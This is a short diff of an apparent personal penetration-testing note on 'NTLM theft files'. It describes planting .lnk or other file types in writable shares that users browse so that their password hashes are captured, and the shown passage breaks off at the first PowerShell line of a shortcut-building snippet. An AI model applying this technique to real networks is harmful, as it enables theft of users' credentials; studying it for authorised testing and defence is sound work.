Jacob-Ham/jacobhio/docs/🪟 Active Directory/2. Initial Compromise/NTLM Theft Files.md

   - Lateral-Movement
   - AD
 ---
-Any writable directory (shares, nfs, locally) where users will list contents you can use a .lnk to steal hashes
+Any writable directory (shares, nfs, locally) where users will list contents you can use certain file types to steal hashes

+**Manual: (.lnk)**

 ```powershell
 $objShell = New-Object -ComObject WScript.Shell